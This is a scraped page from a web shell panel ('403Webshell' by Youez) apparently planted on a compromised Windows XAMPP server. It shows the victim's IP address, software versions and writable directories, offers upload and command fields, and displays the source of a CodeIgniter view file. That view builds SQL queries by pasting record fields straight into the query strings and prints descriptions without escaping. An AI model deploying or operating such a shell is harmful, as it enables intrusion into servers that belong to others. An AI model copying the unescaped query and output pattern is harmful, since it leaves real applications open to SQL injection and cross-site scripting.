403Webshell
Server IP : 101.255.104.117  /  Your IP : 101.255.104.117
Web Server : Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
System : Windows NT DESKTOP-5B8S0D4 6.2 build 9200 (Windows 8 Professional Edition) i586
User : user ( 0)
PHP Version : 5.6.38
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  D:/xampp182/htdocs/repository/application/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : D:/xampp182/htdocs/repository/application/views/single.php
<h4><?= $data->title; ?></h4>

<button onclick="goBack()">Go Back</button>
<script>
  function goBack() {
    window.history.back();
  }
</script>

<hr>

<?php
$author = $this->db->query("SELECT * FROM authors WHERE id = '$data->id_author'")->row()->author;
$type = $this->db->query("SELECT * FROM types WHERE id = '$data->id_type'")->row()->type;
$prodi1 = $this->db->query("SELECT * FROM prodi WHERE id = '$data->id_prodi'")->row()->program_studi;
$date_new = date('d-m-Y', strtotime($data->date . "+0 days"));

if ($data->thumbnail == '') {
  $thumb = 'noimg.png';
} else {
  $thumb = $data->thumbnail;
}

if ($data->file_repo == '') {
  $frepo = 'no_data.jpg';
} else {
  $frepo = $data->file_repo;
}

?>

<div class="row">
  <div class="col-md-4">
    <center><img class="img-thumbnail" src="<?= base_url() ?>uploads/<?= $thumb ?>"></center>
    <br>


  </div>
  <div class="col-md-8">
    <p><b>Description: </b><br><?= $data->description ?></p>
    <p><b>URL: </b><br> <a target="_blank" href="<?= base_url() ?>uploads/<?= $frepo ?>"><?= base_url() ?>uploads/<?= $frepo ?> </a></p>
    <p><b>Type: </b><br> <?= $type ?> </p>
    <p><b>Document: </b><br> <?= $prodi1 ?> </p>
    <p><b>Date: </b><br> <?= $date_new ?> </p>
    <p><b>Author: </b><br> <?= $author ?> </p>
  </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit